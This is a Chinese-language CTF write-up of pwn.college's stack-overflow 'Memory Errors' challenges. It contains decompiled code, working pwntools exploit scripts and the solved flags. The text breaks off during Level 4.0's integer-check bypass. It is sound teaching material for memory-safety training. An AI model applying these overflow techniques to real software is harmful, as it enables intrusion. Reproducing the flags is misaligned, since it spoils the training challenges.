Write-ups: Program Security (Memory Errors) series (Completed)

更新于 Dec 25, 2024 | 09:26 AM # Pwn # Write-ups

Open Table of contents

Level 1.0
- Information
- Description
- Write-up
- Exploit
- Flag
Level 1.1
- Information
- Description
- Write-up
- Exploit
- Flag
Level 2.0
- Information
- Description
- Write-up
- Exploit
- Flag
Level 2.1
- Information
- Description
- Write-up
- Exploit
- Flag
Level 3.0
- Information
- Description
- Write-up
- Exploit
- Flag
Level 3.1
- Information
- Description
- Write-up
- Exploit
- Flag
Level 4.0
- Information
- Description
- Write-up
- Exploit
- Flag
Level 4.1
- Information
- Description
- Write-up
- Exploit
- Flag
Level 5.0
- Information
- Description
- Write-up
- Exploit
- Flag
Level 5.1
- Information
- Description
- Write-up
- Exploit
- Flag
Level 6.0
- Information
- Description
- Write-up
- Exploit
- Flag
Level 6.1
- Information
- Description
- Write-up
- Exploit
- Flag
Level 7.0
- Information
- Description
- Write-up
- Exploit
- Flag
Level 7.1
- Information
- Description
- Write-up
- Exploit
- Flag
Level 8.0
- Information
- Description
- Write-up
- Exploit
- Flag
Level 8.1
- Information
- Description
- Write-up
- Exploit
- Flag
Level 9.0
- Information
- Description
- Write-up
- Exploit
- Flag
Level 9.1
- Information
- Description
- Write-up
- Exploit
- Flag
Level 10.0
- Information
- Description
- Write-up
- Exploit
- Flag
Level 10.1
- Information
- Description
- Write-up
- Exploit
- Flag
Level 11.0
- Information
- Description
- Write-up
- Exploit
- Flag
Level 11.1
- Information
- Description
- Write-up
- Exploit
- Flag
Level 12.0
- Information
- Description
- Write-up
- Exploit
- Flag
Level 12.1
- Information
- Description
- Write-up
- Exploit
- Flag
Level 13.0
- Information
- Description
- Write-up
- Exploit
- Flag
Level 13.1
- Information
- Description
- Write-up
- Exploit
- Flag
Level 14.0
- Information
- Description
- Write-up
- Exploit
- Flag
Level 14.1
- Information
- Description
- Write-up
- Exploit
- Flag
Level 15.0
- Information
- Description
- Write-up
- Exploit
- Flag
Level 15.1
- Information
- Description
- Write-up
- Exploit
- Flag
后记

Level 1.0

Description

Overflow a buffer on the stack to set the right conditions to obtain the flag!

Write-up

分析得程序主要逻辑从 challenge 函数开始，反编译如下：


5 collapsed lines
1
__int64 __fastcall challenge(int a1, __int64 a2, __int64 a3)
2
{
3
  int *v3; // rax
4
  char *v4; // rax
5
  _QWORD v6[3]; // [rsp+0h] [rbp-50h] BYREF
6
  int v7; // [rsp+1Ch] [rbp-34h]
7
  int v8; // [rsp+24h] [rbp-2Ch]
8
  size_t nbytes; // [rsp+28h] [rbp-28h]
9
  _QWORD buf[2]; // [rsp+30h] [rbp-20h] BYREF
10
  _QWORD v11[2]; // [rsp+40h] [rbp-10h] BYREF
11
  __int64 savedregs; // [rsp+50h] [rbp+0h] BYREF
12
  _UNKNOWN *retaddr; // [rsp+58h] [rbp+8h] BYREF
13

38 collapsed lines
14
  v7 = a1;
15
  v6[2] = a2;
16
  v6[1] = a3;
17
  v11[1] = __readfsqword(0x28u);
18
  buf[0] = 0LL;
19
  buf[1] = 0LL;
20
  v11[0] = 0LL;
21
  nbytes = 0LL;
22
  puts("The challenge() function has just been launched!");
23
  sp_ = (__int64)v6;
24
  bp_ = (__int64)&savedregs;
25
  sz_ = ((unsigned __int64)((char *)&savedregs - (char *)v6) >> 3) + 2;
26
  rp_ = (__int64)&retaddr;
27
  puts("Before we do anything, let's take a look at challenge()'s stack frame:");
28
  DUMP_STACK(sp_, sz_);
29
  printf("Our stack pointer points to %p, and our base pointer points to %p.\n", (const void *)sp_, (const void *)bp_);
30
  printf("This means that we have (decimal) %d 8-byte words in our stack frame,\n", sz_);
31
  puts("including the saved base pointer and the saved return address, for a");
32
  printf("total of %d bytes.\n", 8 * sz_);
33
  printf("The input buffer begins at %p, partway through the stack frame,\n", buf);
34
  puts("(\"above\" it in the stack are other local variables used by the function).");
35
  puts("Your input will be read into this buffer.");
36
  printf("The buffer is %d bytes long, but the program will let you provide an arbitrarily\n", 20);
37
  puts("large input length, and thus overflow the buffer.\n");
38
  puts("In this level, there is a \"win\" variable.");
39
  puts("By default, the value of this variable is zero.");
40
  puts("However, when this variable is non-zero, the flag will be printed.");
41
  puts("You can make this variable be non-zero by overflowing the input buffer.");
42
  printf(
43
    "The \"win\" variable is stored at %p, %d bytes after the start of your input buffer.\n\n",
44
    (char *)v11 + 4,
45
    20);
46
  puts("We have disabled the following standard memory corruption mitigations for this challenge:");
47
  puts("- the binary is *not* position independent. This means that it will be");
48
  puts("located at the same spot every time it is run, which means that by");
49
  puts("analyzing the binary (using objdump or reading this output), you can");
50
  puts("know the exact value that you need to overwrite the return address with.\n");
51
  cp_ = bp_;
52
  cv_ = __readfsqword(0x28u);
53
  while ( *(_QWORD *)cp_ != cv_ )
54
    cp_ -= 8LL;
55
  nbytes = 4096LL;
56
  printf("You have chosen to send %lu bytes of input!\n", 4096LL);
57
  printf("This will allow you to write from %p (the start of the input buffer)\n", buf);
58
  printf(
1 collapsed line
59
    "right up to (but not including) %p (which is %d bytes beyond the end of the buffer).\n",
60
    &buf[nbytes / 8],
61
    nbytes - 20);
62
  printf("Send your payload (up to %lu bytes)!\n", nbytes);
63
  v8 = read(0, buf, nbytes);
64
  if ( v8 < 0 )
65
  {
66
    v3 = __errno_location();
14 collapsed lines
67
    v4 = strerror(*v3);
68
    printf("ERROR: Failed to read input -- %s!\n", v4);
69
    exit(1);
70
  }
71
  printf("You sent %d bytes!\n", v8);
72
  puts("Let's see what happened with the stack:\n");
73
  DUMP_STACK(sp_, sz_);
74
  puts("The program's memory status:");
75
  printf("- the input buffer starts at %p\n", buf);
76
  printf("- the saved frame pointer (of main) is at %p\n", (const void *)bp_);
77
  printf("- the saved return address (previously to main) is at %p\n", (const void *)rp_);
78
  printf("- the saved return address is now pointing to %p.\n", *(const void **)rp_);
79
  printf("- the canary is stored at %p.\n", (const void *)cp_);
80
  printf("- the canary value is now %p.\n", *(const void **)cp_);
81
  printf("- the address of the win variable is %p.\n", (char *)v11 + 4);
82
  printf("- the value of the win variable is 0x%x.\n", HIDWORD(v11[0]));
83
  putchar(10);
84
  if ( HIDWORD(v11[0]) )
85
    win();
86
  puts("Goodbye!");
87
  return 0LL;
88
}

注意到这里判断了 v11[0] 的高 32 bits。这时只要 v11[0] 的高 32 bits 不是 0 就都可以进入 if 内部，调用 win：

1
if ( HIDWORD(v11[0]) ) { win(); }

所以我们要做的就是想办法覆盖 v11[0] 的高 32 bits。

1
_QWORD buf[2]; // [rsp+30h] [rbp-20h] BYREF
2
_QWORD v11[2]; // [rsp+40h] [rbp-10h] BYREF
3

4
// ...
5

6
nbytes = 4096LL;
7
// ...
8
v8 = read(0, buf, nbytes);

这里 read 最多可以读取 4096 bytes 到 buf。但是我们的 buf 只有 16 bytes，故存在缓冲区溢出问题，导致覆盖 v11 的值。

所以我们只要先输入 16 bytes 填满 buf，再多写 5 bytes 就可以达到破坏 v11[0] 的高 32 bits 的目的。（注意 read 会把回车读进去，所以本地执行可以只输入 20 bytes）

Exploit

1
#!/usr/bin/python3
2

3
from pwn import context, ELF, process, remote, gdb
4

5
context(log_level="debug", terminal="kitty")
6

7
FILE = "./binary-exploitation-first-overflow-w"
8
HOST = "pwn.college"
9
PORT = 1337
10

11
gdbscript = """
12
c
13
"""
14

15

16
def launch(local=True, debug=False):
17
    if local:
18
        elf = ELF(FILE)
19
        context.binary = elf
20

21
        if debug:
22
            return gdb.debug([elf.path], gdbscript=gdbscript)
23
        else:
24
            return process([elf.path])
25
    else:
26
        return remote(HOST, PORT)
27

28

29
target = launch()
30

31
payload = b"A" * 21
32
target.send(payload)
33

34
target.recvall()

Flag

Flag: pwn.college{oQdReDoKIU218v6uPGguMuFOJnt.0VO4IDL5cTNxgzW}

Level 1.1

Description

This challenge is identical to its “easy” version from a security perspective, but has the following changes:

Unlike the easy version, it does not give you helpful debug output. You will have to recover this information using a debugger.
For all other “hard” versions, the source code will not be provided, and you will need to reverse-engineer the binary using your knowledge of the “easy” version as a reference. However, for this one challenge, to get you familiar with the differences between the easy and hard versions, we will provide the source code.
Some randomization is different. Buffers might have different lengths, offsets might vary, etc. You will need to reverse engineer this information from the binary!

Write-up


1 collapsed line
1
__int64 challenge()
2
{
3
  int *v0; // rax
4
  char *v1; // rax
5
  _QWORD buf[4]; // [rsp+30h] [rbp-30h] BYREF
6
  int v4; // [rsp+50h] [rbp-10h]
7
  unsigned __int64 v5; // [rsp+58h] [rbp-8h]
8

9
  v5 = __readfsqword(0x28u);
10
  memset(buf, 0, sizeof(buf));
11
  v4 = 0;
12
  printf("Send your payload (up to %lu bytes)!\n", 4096LL);
13
  if ( (int)read(0, buf, 0x1000uLL) < 0 )
14
  {
15
    v0 = __errno_location();
16
    v1 = strerror(*v0);
17
    printf("ERROR: Failed to read input -- %s!\n", v1);
18
    exit(1);
19
  }
20
  if ( v4 )
21
    win();
22
  puts("Goodbye!");
23
  return 0LL;
24
}

1
_QWORD buf[4]; // [rsp+30h] [rbp-30h] BYREF
2
int v4; // [rsp+50h] [rbp-10h]
3

4
// ...
5

6
if ( (int)read(0, buf, 0x1000uLL) < 0 ) { /* ... */ }
7

8
// ...
9

10
if ( v4 ) { win(); }

由于程序根据 v4 的值来判断是否执行 win，所以只要令 v4 不为 0 即可。

注意到 buf 只有 32 bytes，但是最大可以输入 4096 bytes，导致溢出覆盖 v4 的值。

Exploit

1
#!/usr/bin/python3
2

3
from pwn import context, ELF, process, remote, gdb
4

5
context(log_level="debug", terminal="kitty")
6

7
FILE = "./binary-exploitation-first-overflow"
8
HOST = "pwn.college"
9
PORT = 1337
10

11
gdbscript = """
12
c
13
"""
14

15

16
def launch(local=True, debug=False):
17
    if local:
18
        elf = ELF(FILE)
19
        context.binary = elf
20

21
        if debug:
22
            return gdb.debug([elf.path], gdbscript=gdbscript)
23
        else:
24
            return process([elf.path])
25
    else:
26
        return remote(HOST, PORT)
27

28

29
target = launch()
30

31
payload = b"A" * 33
32
target.send(payload)
33

34
target.recvall()

Flag

Flag: pwn.college{cwWgAcBgDsBnGFTCky9i1NRqAtO.0FM5IDL5cTNxgzW}

Level 2.0

Description

Overflow a buffer on the stack to set trickier conditions to obtain the flag!

Write-up


4 collapsed lines
1
__int64 __fastcall challenge(int a1, __int64 a2, __int64 a3)
2
{
3
  int *v3; // rax
4
  char *v4; // rax
5
  _QWORD v6[3]; // [rsp+0h] [rbp-D0h] BYREF
6
  int v7; // [rsp+1Ch] [rbp-B4h]
7
  int v8; // [rsp+24h] [rbp-ACh]
8
  size_t nbytes; // [rsp+28h] [rbp-A8h] BYREF
9
  void *buf; // [rsp+30h] [rbp-A0h]
10
  int *v11; // [rsp+38h] [rbp-98h]
11
  _BYTE v12[128]; // [rsp+40h] [rbp-90h] BYREF
12
  int v13; // [rsp+C0h] [rbp-10h] BYREF
13
  unsigned __int64 v14; // [rsp+C8h] [rbp-8h]
14
  __int64 savedregs; // [rsp+D0h] [rbp+0h] BYREF
15
  _UNKNOWN *retaddr; // [rsp+D8h] [rbp+8h] BYREF
3 collapsed lines
16

17
  v7 = a1;
18
  v6[2] = a2;
19
  v6[1] = a3;
20
  v14 = __readfsqword(0x28u);
21
  memset(v12, 0, sizeof(v12));
22
  v13 = 0;
23
  buf = v12;
24
  v11 = &v13;
25
  nbytes = 0LL;
26
  puts("The challenge() function has just been launched!");
27
  sp_ = (__int64)v6;
28
  bp_ = (__int64)&savedregs;
23 collapsed lines
29
  sz_ = ((unsigned __int64)((char *)&savedregs - (char *)v6) >> 3) + 2;
30
  rp_ = (__int64)&retaddr;
31
  puts("Before we do anything, let's take a look at challenge()'s stack frame:");
32
  DUMP_STACK(sp_, sz_);
33
  printf("Our stack pointer points to %p, and our base pointer points to %p.\n", (const void *)sp_, (const void *)bp_);
34
  printf("This means that we have (decimal) %d 8-byte words in our stack frame,\n", sz_);
35
  puts("including the saved base pointer and the saved return address, for a");
36
  printf("total of %d bytes.\n", 8 * sz_);
37
  printf("The input buffer begins at %p, partway through the stack frame,\n", buf);
38
  puts("(\"above\" it in the stack are other local variables used by the function).");
39
  puts("Your input will be read into this buffer.");
40
  printf("The buffer is %d bytes long, but the program will let you provide an arbitrarily\n", 127);
41
  puts("large input length, and thus overflow the buffer.\n");
42
  puts("In this level, there is a \"win\" variable.");
43
  puts("By default, the value of this variable is zero.");
44
  puts("However, if you can set variable to 0x0e530e48, the flag will be printed.");
45
  puts("You can change this variable by overflowing the input buffer, but keep endianness in mind!");
46
  printf(
47
    "The \"win\" variable is stored at %p, %d bytes after the start of your input buffer.\n\n",
48
    v11,
49
    (_DWORD)v11 - (_DWORD)buf);
50
  cp_ = bp_;
51
  cv_ = __readfsqword(0x28u);
52
  while ( *(_QWORD *)cp_ != cv_ )
53
    cp_ -= 8LL;
54
  printf("Payload size: ");
55
  __isoc99_scanf("%lu", &nbytes);
56
  printf("You have chosen to send %lu bytes of input!\n", nbytes);
57
  printf("This will allow you to write from %p (the start of the input buffer)\n", buf);
58
  printf(
1 collapsed line
59
    "right up to (but not including) %p (which is %d bytes beyond the end of the buffer).\n",
60
    (char *)buf + nbytes,
61
    nbytes - 127);
62
  printf("Send your payload (up to %lu bytes)!\n", nbytes);
63
  v8 = read(0, buf, nbytes);
64
  if ( v8 < 0 )
65
  {
66
    v3 = __errno_location();
14 collapsed lines
67
    v4 = strerror(*v3);
68
    printf("ERROR: Failed to read input -- %s!\n", v4);
69
    exit(1);
70
  }
71
  printf("You sent %d bytes!\n", v8);
72
  puts("Let's see what happened with the stack:\n");
73
  DUMP_STACK(sp_, sz_);
74
  puts("The program's memory status:");
75
  printf("- the input buffer starts at %p\n", buf);
76
  printf("- the saved frame pointer (of main) is at %p\n", (const void *)bp_);
77
  printf("- the saved return address (previously to main) is at %p\n", (const void *)rp_);
78
  printf("- the saved return address is now pointing to %p.\n", *(const void **)rp_);
79
  printf("- the canary is stored at %p.\n", (const void *)cp_);
80
  printf("- the canary value is now %p.\n", *(const void **)cp_);
81
  printf("- the address of the win variable is %p.\n", v11);
82
  printf("- the value of the win variable is 0x%x.\n", *v11);
83
  putchar(10);
84
  if ( *v11 == 240324168 )
85
    win();
86
  puts("Goodbye!");
87
  return 0LL;
88
}

1
size_t nbytes; // [rsp+28h] [rbp-A8h] BYREF
2
void *buf; // [rsp+30h] [rbp-A0h]
3
int *v11; // [rsp+38h] [rbp-98h]
4
_BYTE v12[128]; // [rsp+40h] [rbp-90h] BYREF
5
int v13; // [rsp+C0h] [rbp-10h] BYREF
6

7
v13 = 0;
8
buf = v12;
9
v11 = &v13;
10
nbytes = 0LL;
11

12
// ...
13

14
__isoc99_scanf("%lu", &nbytes);
15

16
// ...
17

18
v8 = read(0, buf, nbytes);
19

20
// ...
21

22
if ( *v11 == 240324168 ) { win(); }

如果 v11 指向的地址的内容为 240324168 则触发 win。

注意到我们的 buf 为 128 bytes，由于最大输入长度可由我们自己自定义，因此可以溢出 buf 破坏 v13，将 v13 修改为 240324168 即可。

Exploit

1
#!/usr/bin/python3
2

3
from pwn import context, ELF, process, remote, gdb, p64
4

5
context(log_level="debug", terminal="kitty")
6

7
FILE = "./babymem-level-2-0"
8
HOST = "pwn.college"
9
PORT = 1337
10

11
gdbscript = """
12
c
13
"""
14

15

16
def launch(local=True, debug=False):
17
    if local:
18
        elf = ELF(FILE)
19
        context.binary = elf
20

21
        if debug:
22
            return gdb.debug([elf.path], gdbscript=gdbscript)
23
        else:
24
            return process([elf.path])
25
    else:
26
        return remote(HOST, PORT)
27

28

29
target = launch()
30

31
payload = b"".ljust(128, b"A") + p64(240324168)
32
payload_size = str(len(payload)).encode()
33

34
target.recvuntil(b"Payload size: ")
35
target.sendline(payload_size)
36
target.recvuntil(b"Send your payload")
37
target.send(payload)
38

39
target.recvall()

Flag

Flag: pwn.college{w7aHpdU-9AlFvJ5GtohCFtGwF7M.ddTNzMDL5cTNxgzW}

Level 2.1

Description

Overflow a buffer on the stack to set trickier conditions to obtain the flag!

Exploit

1
#!/usr/bin/python3
2

3
from pwn import context, ELF, process, remote, gdb, p64
4

5
context(log_level="debug", terminal="kitty")
6

7
FILE = "./babymem-level-2-1"
8
HOST = "pwn.college"
9
PORT = 1337
10

11
gdbscript = """
12
c
13
"""
14

15

16
def launch(local=True, debug=False):
17
    if local:
18
        elf = ELF(FILE)
19
        context.binary = elf
20

21
        if debug:
22
            return gdb.debug([elf.path], gdbscript=gdbscript)
23
        else:
24
            return process([elf.path])
25
    else:
26
        return remote(HOST, PORT)
27

28

29
target = launch()
30

31
payload = b"".ljust(0x14, b"A") + p64(758965894)
32
payload_size = str(len(payload)).encode()
33

34
target.recvuntil(b"Payload size: ")
35
target.sendline(payload_size)
36
target.recvuntil(b"Send your payload")
37
target.send(payload)
38

39
target.recvall()

Flag

Flag: pwn.college{sZCPUpjO4U6HmvntMr91HLyNljf.dhTNzMDL5cTNxgzW}

Level 3.0

Description

Overflow a buffer and smash the stack to obtain the flag!

Write-up

38 collapsed lines
###
### Welcome to ./babymem-level-3-0!
###

The challenge() function has just been launched!
Before we do anything, let's take a look at challenge()'s stack frame:
+---------------------------------+-------------------------+--------------------+
|                  Stack location |            Data (bytes) |      Data (LE int) |
+---------------------------------+-------------------------+--------------------+
| 0x00007ffd41f77580 (rsp+0x0000) | b0 75 f7 41 fd 7f 00 00 | 0x00007ffd41f775b0 |
| 0x00007ffd41f77588 (rsp+0x0008) | 68 87 f7 41 fd 7f 00 00 | 0x00007ffd41f78768 |
| 0x00007ffd41f77590 (rsp+0x0010) | 58 87 f7 41 fd 7f 00 00 | 0x00007ffd41f78758 |
| 0x00007ffd41f77598 (rsp+0x0018) | 0b a7 02 f9 01 00 00 00 | 0x00000001f902a70b |
| 0x00007ffd41f775a0 (rsp+0x0020) | 1e 3e 40 00 00 00 00 00 | 0x0000000000403e1e |
| 0x00007ffd41f775a8 (rsp+0x0028) | 00 00 00 00 00 00 00 00 | 0x0000000000000000 |
| 0x00007ffd41f775b0 (rsp+0x0030) | 00 00 00 00 00 00 00 00 | 0x0000000000000000 |
| 0x00007ffd41f775b8 (rsp+0x0038) | 00 00 00 00 00 00 00 00 | 0x0000000000000000 |
| 0x00007ffd41f775c0 (rsp+0x0040) | 00 00 00 00 00 00 00 00 | 0x0000000000000000 |
| 0x00007ffd41f775c8 (rsp+0x0048) | 00 00 00 00 00 00 00 00 | 0x0000000000000000 |
| 0x00007ffd41f775d0 (rsp+0x0050) | 00 00 00 00 00 00 00 00 | 0x0000000000000000 |
| 0x00007ffd41f775d8 (rsp+0x0058) | 00 00 00 00 00 00 00 00 | 0x0000000000000000 |
| 0x00007ffd41f775e0 (rsp+0x0060) | 00 00 00 00 00 00 00 00 | 0x0000000000000000 |
| 0x00007ffd41f775e8 (rsp+0x0068) | 00 00 00 00 00 00 00 00 | 0x0000000000000000 |
| 0x00007ffd41f775f0 (rsp+0x0070) | 00 00 00 00 00 00 00 00 | 0x0000000000000000 |
| 0x00007ffd41f775f8 (rsp+0x0078) | b0 75 f7 41 fd 7f 00 00 | 0x00007ffd41f775b0 |
| 0x00007ffd41f77600 (rsp+0x0080) | 30 86 f7 41 fd 7f 00 00 | 0x00007ffd41f78630 |
| 0x00007ffd41f77608 (rsp+0x0088) | 51 2a 40 00 00 00 00 00 | 0x0000000000402a51 |
+---------------------------------+-------------------------+--------------------+
Our stack pointer points to 0x7ffd41f77580, and our base pointer points to 0x7ffd41f77600.
This means that we have (decimal) 18 8-byte words in our stack frame,
including the saved base pointer and the saved return address, for a
total of 144 bytes.
The input buffer begins at 0x7ffd41f775b0, partway through the stack frame,
("above" it in the stack are other local variables used by the function).
Your input will be read into this buffer.
The buffer is 68 bytes long, but the program will let you provide an arbitrarily
large input length, and thus overflow the buffer.

In this level, there is no "win" variable.
You will need to force the program to execute the win() function
by directly overflowing into the stored return address back to main,
which is stored at 0x7ffd41f77608, 88 bytes after the start of your input buffer.
That means that you will need to input at least 96 bytes (68 to fill the buffer,
20 to fill other stuff stored between the buffer and the return address,
and 8 that will overwrite the return address).
10 collapsed lines

We have disabled the following standard memory corruption mitigations for this challenge:
- the canary is disabled, otherwise you would corrupt it before
overwriting the return address, and the program would abort.
- the binary is *not* position independent. This means that it will be
located at the same spot every time it is run, which means that by
analyzing the binary (using objdump or reading this output), you can
know the exact value that you need to overwrite the return address with.

Payload size:

程序直接告诉我们目的和需要多大的 padding 了，所以接下来直接找 win 的地址就好了。

直接上 pwndbg 查 win 函数地址：

1
pwndbg> i fun
2
All defined functions:
3

4
Non-debugging symbols:
5
0x0000000000401000  _init
6
0x00000000004010f0  putchar@plt
7
0x0000000000401100  __errno_location@plt
8
0x0000000000401110  puts@plt
9
0x0000000000401120  write@plt
10
0x0000000000401130  printf@plt
11
0x0000000000401140  geteuid@plt
12
0x0000000000401150  read@plt
13
0x0000000000401160  setvbuf@plt
14
0x0000000000401170  open@plt
15
0x0000000000401180  __isoc99_scanf@plt
16
0x0000000000401190  exit@plt
17
0x00000000004011a0  strerror@plt
18
0x00000000004011b0  _start
19
0x00000000004011e0  _dl_relocate_static_pie
20
0x00000000004011f0  deregister_tm_clones
21
0x0000000000401220  register_tm_clones
22
0x0000000000401260  __do_global_dtors_aux
23
0x0000000000401290  frame_dummy
24
0x0000000000401296  DUMP_STACK
25
0x0000000000401499  bin_padding
26
0x0000000000402331  win
27
0x0000000000402438  challenge
28
0x000000000040298b  main
29
0x0000000000402a70  __libc_csu_init
30
0x0000000000402ae0  __libc_csu_fini
31
0x0000000000402ae8  _fini

Exploit

1
#!/usr/bin/python3
2

3
from pwn import context, ELF, process, remote, gdb, p64
4

5
context(log_level="debug", terminal="kitty")
6

7
FILE = "./babymem-level-3-0"
8
HOST = "pwn.college"
9
PORT = 1337
10

11
gdbscript = """
12
c
13
"""
14

15

16
def launch(local=True, debug=False):
17
    if local:
18
        elf = ELF(FILE)
19
        context.binary = elf
20

21
        if debug:
22
            return gdb.debug([elf.path], gdbscript=gdbscript)
23
        else:
24
            return process([elf.path])
25
    else:
26
        return remote(HOST, PORT)
27

28

29
target = launch()
30

31
payload = b"".ljust(88, b"A") + p64(0x402331)
32
payload_size = str(len(payload)).encode()
33

34
target.recvuntil(b"Payload size: ")
35
target.sendline(payload_size)
36
target.recvuntil(b"Send your payload")
37
target.send(payload)
38

39
target.recvall()

Flag

Flag: pwn.college{0omKd6AgzV5NaakXpbDyYSre3hD.01M5IDL5cTNxgzW}

Level 3.1

Description

Overflow a buffer and smash the stack to obtain the flag!

Exploit

1
#!/usr/bin/python3
2

3
from pwn import context, ELF, process, remote, gdb, p64
4

5
context(log_level="debug", terminal="kitty")
6

7
FILE = "./babymem-level-3-1"
8
HOST = "pwn.college"
9
PORT = 1337
10

11
gdbscript = """
12
c
13
"""
14

15

16
def launch(local=True, debug=False):
17
    if local:
18
        elf = ELF(FILE)
19
        context.binary = elf
20

21
        if debug:
22
            return gdb.debug([elf.path], gdbscript=gdbscript)
23
        else:
24
            return process([elf.path])
25
    else:
26
        return remote(HOST, PORT)
27

28

29
target = launch()
30

31
payload = b"".ljust(0x88, b"A") + p64(0x401A0B)
32
payload_size = str(len(payload)).encode()
33

34
target.recvuntil(b"Payload size: ")
35
target.sendline(payload_size)
36
target.recvuntil(b"Send your payload")
37
target.send(payload)
38

39
target.recvall()

Flag

Flag: pwn.college{k2xNTDjO8L-Rt_oy5sU-i2dFj1y.0FN5IDL5cTNxgzW}

Level 4.0

Description

Overflow a buffer and smash the stack to obtain the flag, but this time bypass a check designed to prevent you from doing so!

Write-up


3 collapsed lines
1
__int64 __fastcall challenge(int a1, __int64 a2, __int64 a3)
2
{
3
  int *v3; // rax
4
  char *v4; // rax
5
  _QWORD v6[3]; // [rsp+0h] [rbp-B0h] BYREF
6
  int v7; // [rsp+1Ch] [rbp-94h]
7
  size_t nbytes[15]; // [rsp+2Ch] [rbp-84h] BYREF
8
  int v9; // [rsp+A4h] [rbp-Ch]
9
  void *buf; // [rsp+A8h] [rbp-8h]
10
  __int64 savedregs; // [rsp+B0h] [rbp+0h] BYREF
41 collapsed lines
11
  _UNKNOWN *retaddr; // [rsp+B8h] [rbp+8h] BYREF
12

13
  v7 = a1;
14
  v6[2] = a2;
15
  v6[1] = a3;
16
  buf = (char *)nbytes + 4;
17
  memset(nbytes, 0, 110);
18
  puts("The challenge() function has just been launched!");
19
  sp_ = (__int64)v6;
20
  bp_ = (__int64)&savedregs;
21
  sz_ = ((unsigned __int64)((char *)&savedregs - (char *)v6) >> 3) + 2;
22
  rp_ = (__int64)&retaddr;
23
  puts("Before we do anything, let's take a look at challenge()'s stack frame:");
24
  DUMP_STACK(sp_, sz_);
25
  printf("Our stack pointer points to %p, and our base pointer points to %p.\n", (const void *)sp_, (const void *)bp_);
26
  printf("This means that we have (decimal) %d 8-byte words in our stack frame,\n", sz_);
27
  puts("including the saved base pointer and the saved return address, for a");
28
  printf("total of %d bytes.\n", 8 * sz_);
29
  printf("The input buffer begins at %p, partway through the stack frame,\n", buf);
30
  puts("(\"above\" it in the stack are other local variables used by the function).");
31
  puts("Your input will be read into this buffer.");
32
  printf("The buffer is %d bytes long, but the program will let you provide an arbitrarily\n", 106);
33
  puts("large input length, and thus overflow the buffer.\n");
34
  puts("In this level, there is no \"win\" variable.");
35
  puts("You will need to force the program to execute the win() function");
36
  puts("by directly overflowing into the stored return address back to main,");
37
  printf(
38
    "which is stored at %p, %d bytes after the start of your input buffer.\n",
39
    (const void *)rp_,
40
    rp_ - (_DWORD)buf);
41
  printf(
42
    "That means that you will need to input at least %d bytes (%d to fill the buffer,\n",
43
    rp_ - (_DWORD)buf + 8,
44
    106);
45
  printf("%d to fill other stuff stored between the buffer and the return address,\n", rp_ - (_DWORD)buf - 106);
46
  puts("and 8 that will overwrite the return address).\n");
47
  puts("We have disabled the following standard memory corruption mitigations for this challenge:");
48
  puts("- the canary is disabled, otherwise you would corrupt it before");
49
  puts("overwriting the return address, and the program would abort.");
50
  puts("- the binary is *not* position independent. This means that it will be");
51
  puts("located at the same spot every time it is run, which means that by");
52
  puts("analyzing the binary (using objdump or reading this output), you can");
53
  puts("know the exact value that you need to overwrite the return address with.\n");
54
  printf("Payload size: ");
55
  __isoc99_scanf("%i", nbytes);
56
  puts("This challenge is more careful: it will check to make sure you");
57
  puts("don't want to provide so much data that the input buffer will");
58
  puts("overflow. But recall twos compliment, look at how the check is");
59
  puts("implemented, and try to beat it!");
60
  if ( SLODWORD(nbytes[0]) > 106 )
61
  {
62
    puts("Provided size is too large!");
63
    exit(1);
64
  }
65
  puts("You made it past the check! Because the read() call will interpret");
66
  puts("your size differently than the check above, the resulting read will");
67
  puts("be unstable and might fail. You will likely have to try this several");
14 collapsed lines
68
  puts("times before your input is actually read.");
69
  printf("You have chosen to send %i bytes of input!\n", LODWORD(nbytes[0]));
70
  printf("This will allow you to write from %p (the start of the input buffer)\n", buf);
71
  printf(
72
    "right up to (but not including) %p (which is %d bytes beyond the end of the buffer).\n",
73
    (char *)buf + SLODWORD(nbytes[0]),
74
    LODWORD(nbytes[0]) - 106);
75
  printf("Of these, you will overwrite %d bytes into the return address.\n", (_DWORD)buf + LODWORD(nbytes[0]) - rp_);
76
  puts("If that number is greater than 8, you will overwrite the entire return address.\n");
77
  puts("You will want to overwrite the return value from challenge()");
78
  printf("(located at %p, %d bytes past the start of the input buffer)\n", (const void *)rp_, rp_ - (_DWORD)buf);
79
  printf("with %p, which is the address of the win() function.\n", win);
80
  puts("This will cause challenge() to return directly into the win() function,");
81
  puts("which will in turn give you the flag.");
82
  puts("Keep in mind that you will need to write the address of the win() function");
83
  puts("in little-endian (bytes backwards) so that it is interpreted properly.\n");
84
  printf("Send your payload (up to %i bytes)!\n", LODWORD(nbytes[0]));
85
  v9 = read(0, buf, LODWORD(nbytes[0]));
86
  if ( v9 < 0 )
87
  {
88
    v3 = __errno_location();
20 collapsed lines
89
    v4 = strerror(*v3);
90
    printf("ERROR: Failed to read input -- %s!\n", v4);
91
    exit(1);
92
  }
93
  printf("You sent %d bytes!\n", v9);
94
  puts("Let's see what happened with the stack:\n");
95
  DUMP_STACK(sp_, sz_);
96
  puts("The program's memory status:");
97
  printf("- the input buffer starts at %p\n", buf);
98
  printf("- the saved frame pointer (of main) is at %p\n", (const void *)bp_);
99
  printf("- the saved return address (previously to main) is at %p\n", (const void *)rp_);
100
  printf("- the saved return address is now pointing to %p.\n", *(const void **)rp_);
101
  printf("- the address of win() is %p.\n", win);
102
  putchar(10);
103
  puts("If you have managed to overwrite the return address with the correct value,");
104
  puts("challenge() will jump straight to win() when it returns.");
105
  printf("Let's try it now!\n\n");
106
  puts("Goodbye!");
107
  return 0LL;
108
}

1
// ...
2

3
if ( SLODWORD(nbytes[0]) > 106 )
4
{
5
  puts("Provided size is too large!");
6
  exit(1);
7
}

SLODWORD(nbytes[0]) > 106 则退出程序。但是我们的 payload 为 144 bytes（提示信息中已经说明了 payload 长度），因此显然不能在 payload size 中直接输入 144。

为了绕过这一点，我们注意到 nbytes 的类型为 size_t：

1
// ...
2

3
size_t nbytes[15]; // [rsp+2Ch] [rbp-84h] BYREF

因为 size_t 是无符号整形，所以如果我们提供一个负数，它将会被隐式地转换为无符号数。

根据补码规则我们知道，-1 会被表示成 0xffffffff，如果把它看作无符号数，这无疑是相当大的一个数字。

又因为程序使用 SLODWORD 来判断，这是获取一个有符号数的低 DWORD。

那么如果我们输入 -1 ，则程序最后执行 SLODWORD(nbytes[0]) > 106 时判断的会是 0xffffffff 和 106 的大小。很显然前者小于后者，成功绕过了这个 if 判断。

而由于有符号数被隐式转换为无符号数保存在了 nbytes 中，故我们获得了一个相当大的输入范围。

